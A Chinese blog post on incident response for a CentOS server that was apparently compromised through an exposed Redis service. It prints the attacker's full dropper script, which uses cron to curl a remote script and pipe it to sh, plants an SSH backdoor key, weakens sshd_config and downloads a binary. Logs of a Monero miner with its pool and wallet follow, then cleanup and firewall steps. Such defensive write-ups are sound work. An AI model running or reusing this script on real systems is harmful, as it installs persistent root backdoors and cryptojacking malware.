版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/chunlongyuan/article/details/79258443
刚开始搞服务器踩过的坑,贴出来分享下,当时应该是centos 6。
2016年10月15日23:01:55更新
该问题是因为redis可外网访问的漏洞导致,黑客在定时任务里执行自己的脚本,脚本内容如下:
[root@iZ25o9lq6f5Z ~]# cat pm.sh\?0706
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys*
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq
echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
/etc/init.d/sshd restart
fi
if [ ! -f "/etc/init.d/ntp" ]; then
if [ ! -f "/etc/systemd/system/ntp.service" ]; then
mkdir -p /opt
curl -fsSL http://r.chanstring.com/v51/lady_`uname -m` -o /opt/KHK75NEOiq33 && chmod +x /opt/KHK75NEOiq33 && /opt/KHK75NEOiq33 -Install
fi
fi
/etc/init.d/ntp start
ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9
==该脚本里涉及到的文件夹和文件都需要处理==
彻底解决问题
配置防火墙
然后就是处理服务器里面的问题了==该脚本里涉及到的文件夹和文件都需要处理==
第一次编辑
查看CPU占用前十进程
[root@iZ25o9lq6f5Z ~]# ps -eo comm,pcpu --sort -pcpu | head -10
COMMAND %CPU
minerd 98.4
java 0.3
AliHids 0.3
AliYunDun 0.2
redis-server 0.1
java 0.1
init 0.0
kthreadd 0.0
migration/0 0.0
[root@iZ25o9lq6f5Z ~]#
kill掉minerd进程
[root@iZ25o9lq6f5Z ~]# ps aux | grep minerd
root 2449 98.4 0.5 239504 5376 ? SLsl Oct03 445:54 /opt/minerd -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:6666 -u 48vKMSzWMF8TCVvMJ6jV1BfKZJFwNXRntazXquc7fvq9DW23GKkcvQMinrKeQ1vuxD4RTmiYmCwY4inWmvCXWbcJHL3JDwp -p x
root 5384 0.0 0.0 103256 848 pts/0 S+ 06:53 0:00 grep minerd
[root@iZ25o9lq6f5Z ~]# kill -9 2449
[root@iZ25o9lq6f5Z ~]# ps aux | grep minerd
root 5386 0.0 0.0 103252 844 pts/0 S+ 06:53 0:00 grep minerd
[root@iZ25o9lq6f5Z ~]#
kill后又出现了该进程
[root@iZ25o9lq6f5Z opt]# ps aux | grep minerd
root 5388 98.2 0.3 239504 3364 ? SLsl 06:53 2:07 /opt/minerd -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:6666 -u 48vKMSzWMF8TCVvMJ6jV1BfKZJFwNXRntazXquc7fvq9DW23GKkcvQMinrKeQ1vuxD4RTmiYmCwY4inWmvCXWbcJHL3JDwp -p x
root 5405 0.0 0.0 103252 844 pts/0 S+ 06:55 0:00 grep minerd
[root@iZ25o9lq6f5Z opt]#
查看该进程的启动文件
[root@iZ25o9lq6f5Z opt]# ls -la /opt/
total 11172
drwxr-xr-x. 3 root root 4096 Oct 4 06:54 .
dr-xr-xr-x. 23 root root 4096 Sep 26 00:15 ..
-rwxr-xr-x. 1 root root 8444416 Sep 25 23:23 KHK75NEOiq33
-rwxr-xr-x. 1 root root 2979640 Oct 3 23:17 minerd
drwxr-xr-x. 2 root root 4096 Nov 22 2013 rh
[root@iZ25o9lq6f5Z opt]#
全改为只读
[root@iZ25o9lq6f5Z opt]# ll
total 11164
-rwxr-xr-x. 1 root root 8444416 Sep 25 23:23 KHK75NEOiq33
-rwxr-xr-x. 1 root root 2979640 Oct 3 23:17 minerd
drwxr-xr-x. 2 root root 4096 Nov 22 2013 rh
[root@iZ25o9lq6f5Z opt]# sudo chmod u-x minerd
[root@iZ25o9lq6f5Z opt]# ll
total 11164
-rwxr-xr-x. 1 root root 8444416 Sep 25 23:23 KHK75NEOiq33
-rw-r-xr-x. 1 root root 2979640 Oct 3 23:17 minerd
drwxr-xr-x. 2 root root 4096 Nov 22 2013 rh
[root@iZ25o9lq6f5Z opt]# sudo chmod 400 minerd
[root@iZ25o9lq6f5Z opt]# ll
total 11164
-rwxr-xr-x. 1 root root 8444416 Sep 25 23:23 KHK75NEOiq33
-r--------. 1 root root 2979640 Oct 3 23:17 minerd
drwxr-xr-x. 2 root root 4096 Nov 22 2013 rh
[root@iZ25o9lq6f5Z opt]# sudo chmod 400 KHK75NEOiq33
[root@iZ25o9lq6f5Z opt]# ll
total 11164
-r--------. 1 root root 8444416 Sep 25 23:23 KHK75NEOiq33
-r--------. 1 root root 2979640 Oct 3 23:17 minerd
drwxr-xr-x. 2 root root 4096 Nov 22 2013 rh
[root@iZ25o9lq6f5Z opt]# sudo chmod 400 rh
[root@iZ25o9lq6f5Z opt]# ll
total 11164
-r--------. 1 root root 8444416 Sep 25 23:23 KHK75NEOiq33
-r--------. 1 root root 2979640 Oct 3 23:17 minerd
dr--------. 2 root root 4096 Nov 22 2013 rh
再杀
[root@iZ25o9lq6f5Z opt]# ps aux | grep minerd
root 5388 98.5 0.3 239504 3364 ? SLsl 06:53 6:28 /opt/minerd -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:6666 -u 48vKMSzWMF8TCVvMJ6jV1BfKZJFwNXRntazXquc7fvq9DW23GKkcvQMinrKeQ1vuxD4RTmiYmCwY4inWmvCXWbcJHL3JDwp -p x
root 5428 0.0 0.0 103252 844 pts/0 S+ 06:59 0:00 grep minerd
[root@iZ25o9lq6f5Z opt]# kill -9 5388
[root@iZ25o9lq6f5Z opt]# ps aux | grep minerd
root 5435 0.0 0.0 103252 844 pts/0 S+ 07:00 0:00 grep minerd
[root@iZ25o9lq6f5Z opt]# ps aux | grep minerd
root 5439 0.0 0.0 103252 840 pts/0 S+ 07:00 0:00 grep minerd
[root@iZ25o9lq6f5Z opt]# ps -eo comm,pcpu --sort -pcpu | head -10
COMMAND %CPU
java 0.3
AliHids 0.3
AliYunDun 0.2
redis-server 0.1
java 0.1
init 0.0
kthreadd 0.0
migration/0 0.0
ksoftirqd/0 0.0
[root@iZ25o9lq6f5Z opt]#
查看定时脚本,同样存在问题,删掉
[root@iZ25o9lq6f5Z ~]# crontab -l
*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh
[root@iZ25o9lq6f5Z ~]#
[root@iZ25o9lq6f5Z ~]# cd /var/spool/cron/crontabs/
[root@iZ25o9lq6f5Z crontabs]# ll
total 4
-rw-r--r--. 1 root root 64 Oct 4 06:40 root
[root@iZ25o9lq6f5Z crontabs]# cat root
*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh
关闭redis外网访问
[root@iZ25o9lq6f5Z redis]# iptables -A INPUT -s 127.0.0.1 -p tcp --dport 6379 -j ACCEPT
[root@iZ25o9lq6f5Z redis]# iptables -A INPUT -p TCP --dport 6379 -j REJECT
修改服务器密码,重启